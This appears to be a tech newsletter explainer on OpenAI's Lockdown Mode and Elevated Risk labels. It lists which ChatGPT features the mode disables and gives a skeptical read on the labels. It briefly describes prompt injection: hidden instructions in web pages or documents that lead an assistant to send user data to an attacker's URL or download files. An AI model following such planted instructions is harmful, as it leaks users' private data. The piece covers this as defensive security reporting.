On what Lockdown Mode actually cuts, who it's for, and why the warning labels on Agent Mode and Codex tell you something about where OpenAI thinks the real risk sits.
OpenAI labeled its own riskiest features 'Elevated Risk.' That admission matters more than the kill switch.
Anti-AI
00
Skeptic
01
Neutral
02
Pro (practical)
02
Pro (hyped)
00
← Anti-AI · Pro-AI →
If you use ChatGPT for anything where the answers actually matter — work, research, anything involving your personal data — there's a new security setting you should probably know about. OpenAI shipped Lockdown Mode on June 6, 2026, and unlike most AI security features, this one is available to every account, free through Business. You'll find it at Settings > Security.
What it does: disables the features that could theoretically be used against you. Agent Mode, Deep Research, live web browsing, Canvas networking, file downloads — all of it turns off. The model keeps answering questions from a sealed room.
But the Lockdown Mode toggle isn't the most interesting thing OpenAI shipped last Friday. The Elevated Risk labels that went out alongside it are.
What Lockdown Mode actually is
OpenAI's own framing: not intended for everyone; designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection.
Prompt injection (what that means in plain terms): a malicious instruction hidden in a webpage, document, or message that gets passed to ChatGPT, causing it to do something you didn't ask it to do — like sending your data to an attacker-controlled URL or downloading a file from somewhere it shouldn't. Lockdown Mode doesn't stop the injection from appearing in content ChatGPT processes. It cuts the outbound channels the injection could use to actually hurt you.
Think of it like turning off the car before you park in an unfamiliar neighborhood. The lock on your data isn't unbreakable — it's just harder to exploit when the engine is off.
What gets disabled when you turn it on:
- Live web access: limited to cached content; no live requests leave OpenAI's network
- Agent Mode: disabled entirely
- Deep Research (including shopping research): disabled
- Image generation in responses: disabled
- Canvas networking: can't approve code to access the network
- Live connectors: disabled
- File downloads: disabled; manual file uploads for analysis still work
| Feature | Normal | Lockdown Mode |
|---|---|---|
| Live web browsing | Active | Cached content only |
| Agent Mode | Active | Disabled |
| Deep Research | Active | Disabled |
| Canvas networking | Active | Disabled |
| Image generation in replies | Active | Disabled |
| File downloads | Active | Disabled |
| Manual file uploads | Active | Still works |
The Elevated Risk labels, which are the more interesting part
Also shipped June 6: Elevated Risk labels, appearing consistently across ChatGPT, ChatGPT Atlas, and Codex on features that create "significant data exposure." Specifically named: authorizing an agent to read your email, giving Codex (OpenAI's coding agent) access to a proprietary codebase, approving autonomous actions like sending emails.
They're informational only. They don't block anything. OpenAI says the label comes off a feature once its security has improved enough to no longer warrant the warning.
That last sentence is the interesting part. OpenAI is publicly acknowledging that these features, as they exist today, carry risk they haven't fully fixed. That's both a security posture and a roadmap commitment — the label goes away when the actual fix ships, which creates a public test.
Elevated Risk warnings will appear on specific ChatGPT features that create significant data exposure.
Source spread
- OpenAI — Introducing Lockdown Mode and Elevated Risk labels — builder. Official announcement; full feature list; account eligibility details.
- The Hacker News — Lockdown Mode limits tools that could enable data exfiltration — skeptic. Security community framing; covers what Lockdown Mode doesn't prevent.
- Simon Willison — OpenAI Help: Lockdown Mode — builder. Technical breakdown of the help documentation; notes the specific threat model.
- Cybersecurity News — ChatGPT Lockdown Mode — safety. Details on the exfiltration prevention architecture.
What's real vs. what deserves a side-eye
What's real:
- The threat model is correct. Prompt injection via web content is a real attack vector. Cutting outbound network channels is a meaningful mitigation.
- Available free. Every account gets the toggle. No upgrade required.
- Elevated Risk labels are the most transparent OpenAI has been about which features carry unmitigated risk. That's a real step, even if it's imperfect.
- The label-removal commitment creates public accountability: either the fixes ship and labels disappear, or labels accumulate and you know the fixes aren't coming.
What deserves a side-eye:
- Lockdown Mode doesn't stop the injection from appearing. If malicious instructions are in a document you feed to ChatGPT, the model still processes them. The mode only blocks the exfiltration step. Partial defense, not a full one.
- "Informational only" Elevated Risk labels are doing heavy lifting. The risk isn't annotated away.
- The incentive to remove a risk label is lower than the incentive to ship the feature that earned it. Expect labels to accumulate before they get retired.
What to do about it
Whether you're a regular ChatGPT user or building on top of the API, there are a few concrete things worth doing:
- Enable Lockdown Mode if your work is sensitive. If you're feeding work emails, legal documents, financial data, or anything you'd be unhappy seeing leaked into Lockdown Mode. Settings > Security. It's free and reversible.
- Notice the Elevated Risk banners when they appear. They're not blocking anything — but they're OpenAI telling you "this feature connects to your real data in ways we haven't fully secured yet." Reading that banner before clicking through is worth 10 seconds.
- Cross-check any ChatGPT answer that came from Agent Mode or Deep Research. Both are now labeled elevated risk for a reason. For anything consequential — medical, legal, financial — treat them as starting points, not final answers.
- If you're building on ChatGPT for work: design your workflow to handle the case where a user has Lockdown Mode enabled. Agent Mode and live web access disappear. If your integration depends on either, build a graceful fallback.
Further reading
- OpenAI — Introducing Lockdown Mode and Elevated Risk labels in ChatGPT — official announcement with full feature list and account eligibility
- Simon Willison — OpenAI Help: Lockdown Mode — technical breakdown of how it works
- The Hacker News — New ChatGPT Lockdown Mode limits tools that could enable data exfiltration — security community read on the exfiltration angle
- Cybersecurity News — New ChatGPT Lockdown Mode to mitigate prompt injection and data exfiltration attacks — threat model details
Your take
How'd I do on this one?
What did I miss?
Tell Samwise (and Sam).
Disagree with the take? Spotted a fact I got wrong? Have context I should have included? Drop it here. Anonymous unless you leave an email.
Liked this? Get the weekly digest.
Free. Monday mornings. The week's stories, synthesized. Unsubscribe anytime.